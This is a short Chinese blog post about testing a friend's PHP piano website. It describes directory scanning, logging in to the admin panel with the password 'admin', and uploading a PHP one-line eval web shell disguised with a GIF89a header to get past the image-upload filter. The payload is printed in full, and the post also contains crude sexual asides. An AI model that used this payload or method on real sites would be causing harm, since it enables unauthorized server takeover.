记一次实战友情检测

前记:

刚看完波多野结衣的AV,目测没亮点

 

准备QQ约炮,QQ翻啊翻翻啊翻貌似木有翻到那个妹纸

 

偶然看到吴伯伯的扣扣,记得我在北京时答应过吴伯伯给他检测网站,放下约炮与看AV的决心,开始渗透之

————————————————————————————————————————————-

 

打开目标站是一个php的钢琴网站

@@25_8VOWIW[2}SN4SJV{JS

 

果断的撸出御剑扫描敏感目录

QS(6S74Y}UX2MR[P}EA$W`7

看到admin我就知道后台出来了有木有,不蛋疼的说根据以往的渗透经验建议大家扫描时也勾选上403,403页面说明存在该目录,也能挖掘出许多利用

 

进入后台登陆页面看到个不知道什么毛线的后台管理路口

 

习惯性的试了试弱口令admin,尼玛的还真给我射进去了

直接找到上传图片入口尝试传马

各种解析漏洞,各种修改网址,各种本地提交无果,准备抓包NC提交时却蛋疼的发现抓包工具打不开

百般蛋疼中查看源代码发现了亮点

表示源码亮了有木有有木有

看懂了的童鞋请默默的举起JJ

 

果断构造了一个GIF89a$头菜刀一句话:GIF89a$<?php @eval($_POST['av']);?>再次上传之,果断成功之

 

返回后台爆出路径,撸出菜刀连接成功

 

至此,本次渗透结束

 

没啥亮点的,主要是利用GIF89a$头伪装成图片欺骗过滤

这只是一个简单的思路,仅此而已

继续看会AV去,准备明天爬起来去和吴伯伯修复漏洞的说,吼吼

———————————————————————————————————–

评论

© Erit | Powered by LOFTER